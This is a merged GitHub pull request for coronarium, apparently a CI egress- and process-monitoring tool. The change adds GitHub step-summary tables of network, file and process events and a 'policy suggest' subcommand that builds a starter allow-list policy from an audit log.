report/suggest: enriched step summary + policy suggest from audit log#46
Merged
Conversation
coronarium report
events by kind
denied samples (first 10)
📊 Open the full HTML report locallyrm -rf /tmp/coronarium-25630421820 && gh run download 25630421820 -R bokuweb/sakimori -n coronarium-report -D /tmp/coronarium-25630421820 && (open /tmp/coronarium-25630421820/coronarium-report.html 2>/dev/null || xdg-open /tmp/coronarium-25630421820/coronarium-report.html 2>/dev/null || echo "open file:///tmp/coronarium-25630421820/coronarium-report.html")Requires the |
Closes two harden-runner parity gaps: - `report::render_step_summary` now writes Network / Files / Processes top-N tables into `$GITHUB_STEP_SUMMARY` with denied rows flagged and sorted first, so reviewers can spot offending destinations on the run page without downloading the JSON log. - New `coronarium policy suggest <log>` reads an audit-mode JSON log and emits a starter `policy.yml` (network.allow per host:port, file.allow per parent dir, exec targets surfaced as a commented observation block — never auto-denied). Remaining harden-runner gaps (SNI egress, workspace tamper detection, floating-tag pin check, per-PID source attribution) are tracked in the new "harden-runner parity gaps" section of CLAUDE.md. Co-Authored-By: Claude Opus 4.7 (1M context) <[email protected]> Signed-off-by: bokuweb <[email protected]>
bokuweb
force-pushed
the
claude/friendly-visvesvaraya-a771ab
branch
from
c2fd129 to
54eb8e6
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Closes two
step-security/harden-runnerparity gaps that came upin the gap analysis:
$GITHUB_STEP_SUMMARY—report::render_step_summarynow writes per-destination Network / per-path Files / per-binary
Processes top-N tables into the step summary. Denied rows are
flagged with ❌ and sorted to the top of the truncated table so
the offending destinations surface even when the long tail of
benign opens fills the rest. Pipe characters in commands and
paths are escaped so a hostile filename can't break the table.
coronarium policy suggest <audit.json>— new subcommandthat reads a
coronarium run --mode audit --log foo.jsonlogand emits a starter
policy.yml.network.allowgets one entryper
host:portobserved (hostname preferred over IP);file.allowgets one entry per parent directory observed;exec targets are surfaced as a commented
# observed_exec:block so the operator can hand-pick what to deny — the
suggester never auto-populates
process.deny_exec. Reads from-as stdin too.The remaining harden-runner gaps (SNI-based egress at the proxy,
workspace tamper detection, floating-tag → SHA-pin static check,
per-PID source attribution) are tracked under a new
"harden-runner parity gaps" section in CLAUDE.md so they don't
get lost. SaaS dashboard and automatic runner hardening are
explicitly listed as out-of-scope.
Side effect:
Eventgains aDeserializederive (wasSerialize-only) so the audit log can round-trip throughpolicy suggest.Test plan
cargo fmt --all -- --checkcargo clippy --workspace --all-targets -- -D warningscargo test --workspace— 14 new unit tests (8 insuggest,6 in
report) on top of existing 80; all greenecho '{...samples...}' | coronarium policy suggest -produces a sane YAML with hostname-keyed allow entries and
a commented exec block
🤖 Generated with Claude Code